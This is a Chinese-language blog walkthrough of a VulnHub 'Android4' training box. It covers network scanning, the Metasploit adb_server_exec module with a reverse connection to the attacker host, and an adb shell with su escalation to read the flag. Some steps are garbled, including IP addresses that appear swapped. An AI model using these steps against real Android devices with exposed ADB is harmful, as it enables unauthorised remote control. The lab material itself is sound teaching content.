1. 程式人生 > >記一次對`vulnhub`中`Android4`靶機滲透測試全過程

記一次對`vulnhub`中`Android4`靶機滲透測試全過程

記一次對vulnhubAndroid4靶機滲透測試全過程

Android4靶機簡介

名稱:Android4

作業系統:Android v4.4

標誌:/data/root/(在此目錄中)

等級:初學者。

搭建成功的Android平臺

知識點

  1. 埠掃描和IP發現

  2. 使用adb_server_exec攻擊埠8080代理

  3. 使用ADB連線到裝置。

  4. 使用metasploit

  5. 特權升級和找到答案

滲透過程

1:獲取IP地址

使用命令:arp-scan -l

由此我們可以看到靶機的IP地址:192.168.232.146

2:掃描開放埠

在此掃描中,我們將使用最流行的工具nmap進行全端激進掃描

使用命令:nmap -p- -A 192.168.232.146

由此我確定存在與埠8080相關的某種網頁。

沒有任何延遲,我打開了網頁,但什麼也沒找到。

大多數人都會確定使用POST方法涉及某種語言篡改。我也嘗試過,但沒有發現任何有用的東西。

在嘗試了一些其他方法(PHP CLIDropbear RCE)之後,我發現了一種比較好的方法

關於PHP CLI的漏洞掃描:searchsploit -w php cli(關於searchsploit的使用方法:記一次在實戰靶機中使用SearchSploit的總結)

我試過PHP CLIDropbear RCE之後發現Dropbear的掃描會得到有用的資訊

Android Debug Bridge(adb)是一個多功能的命令列工具,可讓您與裝置進行通訊(關於adb的使用方法:adb使用-詳細教程(Awesome Adb))

adb命令可以促進各種裝置操作,例如安裝和除錯應用程式,並且可以訪問可用於在裝置上執行各種命令的Unix shell

它是一個客戶端 - 伺服器程式,包括三個元件

1:傳送命令的客戶端。客戶端在您的開發計算機上執行。您可以通過發出adb命令從命令列終端呼叫客戶端。

2:一個守護程式(adbd),它在裝置上執行命令。守護程式在每個裝置上作為後臺程序執行。

3:伺服器,用於管理客戶端和守護程式之間的通訊。伺服器作為開發計算機上的後臺程序執行。

如果您沒有安裝adb,可以通過sudo apt-get install adb安裝它

sudo apt-get install abd

要啟動ADB伺服器,我們使用了metasploit

首先:啟動metasploit

msfconsole

本地埠很可能不接受連線。在這種情況下,我們將預設埠從4444更改為3333

use exploit/android/adb/adb_server_exec
set RHOST 192.168.232.145
set LHOST 192.168.232.146
set LPORT 3333
exploit

接下來就是需要使用adb

只要上面狀態顯示“正在連線到裝置”,在新的終端視窗上鍵入命令:

adb connect 192.168.232.146:5555

adb shell

我們檢視一下密碼:

並沒有發現什麼有用的內容

defaullt目錄:

su
id
ls

/data目錄中,我們找到了一個名為“root”的資料夾

cd /data
ls

最後一步是成功得到答案:

cd /root
ls
cat flag.txt

參考資料: